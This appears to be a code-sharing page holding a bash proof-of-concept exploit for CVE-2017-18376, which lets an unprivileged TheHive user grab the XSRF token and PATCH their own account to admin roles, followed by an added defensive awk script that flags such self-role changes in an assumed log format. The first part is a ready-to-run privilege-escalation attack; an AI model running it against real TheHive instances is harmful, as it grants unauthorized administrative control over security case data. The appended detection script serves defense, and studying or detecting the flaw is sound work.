Created
June 19, 2019 09:25
Exploit for CVE-2017-18376
#! /bin/bash
# Author:
#   Doriann "Ra'Jiska" Corlouër
# Description:
#   Exploit POC for CVE-2017-18376 - https://nvd.nist.gov/vuln/detail/CVE-2017-18376
#   This POC allows a TheHive user with minimal rights (read, read / write) to gain admin rights (privilege escalation)
# Setup:
#   Edit the following variables:
#   - THEHIVE_ROOT_URL => The URL of your TheHive instance
#   - USERNAME => The username of your unprivileged account
#   - PASSWORD => The password of your unprivileged account
# Execution:
#   $ bash thehiveprivesc.sh
THEHIVE_ROOT_URL="https://somelink.com/thehive"
USERNAME="username"
PASSWORD="password"
COOKIE="$(/bin/mktemp --suffix=_thehivecookie)"
CURL="/usr/bin/curl -v -c $COOKIE -b $COOKIE"
$CURL $THEHIVE_ROOT_URL # Retrieve CSRF
$CURL $THEHIVE_ROOT_URL/api/login --data "{\"user\":\"$USERNAME\",\"password\":\"$PASSWORD\"}" -H 'Content-Type: application/json;charset=utf-8'
XSRF_TOKEN=$(/bin/cat $COOKIE |/bin/grep 'XSRF-TOKEN' |/usr/bin/awk {'$1=$2=$3=$4=$5=$6=""; print $0'} |/usr/bin/awk {'print $1'}) # Retrieve saved CSRF for header
$CURL -X PATCH $THEHIVE_ROOT_URL/api/user/$USERNAME --data '{"roles":["read","write","admin"]}' -H "X-XSRF-TOKEN: $XSRF_TOKEN" -H 'Content-Type: application/json;charset=utf-8'
/bin/rm -f $COOKIE
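
A defender-side check for the request this POC sends, added here as an example and not part of the original gist: it flags PATCH requests to `/api/user/<login>` in which the session user changes the `roles` of their own account. The tab-separated log format (timestamp, session user, method, path, request body), the function names, and the sample lines are assumptions constructed for illustration; TheHive does not produce this log itself.

```shell
#!/bin/sh
# Added detection example. The log format is an assumption:
# tab-separated fields: timestamp, session user, method, path, request body.

# Constructed sample lines (not real traffic).
sample_log() {
    printf '%s\t%s\t%s\t%s\t%s\n' \
        '2019-06-19T09:20:01Z' 'analyst1' 'PATCH' '/thehive/api/user/analyst1' '{"name":"Analyst One"}' \
        '2019-06-19T09:21:14Z' 'analyst1' 'PATCH' '/thehive/api/user/analyst1' '{"roles":["read","write","admin"]}' \
        '2019-06-19T09:22:40Z' 'orgadmin' 'PATCH' '/thehive/api/user/analyst2' '{"roles":["read","write"]}' \
        '2019-06-19T09:23:05Z' 'analyst2' 'GET' '/thehive/api/user/analyst2' '-'
}

# Reads log lines on stdin and prints "timestamp<TAB>user<TAB>body" for every
# PATCH to .../api/user/<login> that carries a "roles" key and whose target
# login is the same as the session user (a self-service role change).
flag_role_self_grant() {
    awk -F '\t' '
        $3 == "PATCH" && $5 ~ /"roles"[ ]*:/ {
            n = split($4, seg, "/")
            # Only consider paths that end in /api/user/<login>.
            if (n < 3 || seg[n-1] != "user" || seg[n-2] != "api") next
            # Profile edits by the same user are normal; role edits are not.
            if (seg[n] == $2) print $1 "\t" $2 "\t" $5
        }
    '
}

# Stand-alone run over the constructed sample.
sample_log | flag_role_self_grant
```

Role changes made by a different account (the `orgadmin` line) are not flagged; review those against your own list of accounts allowed to administer users.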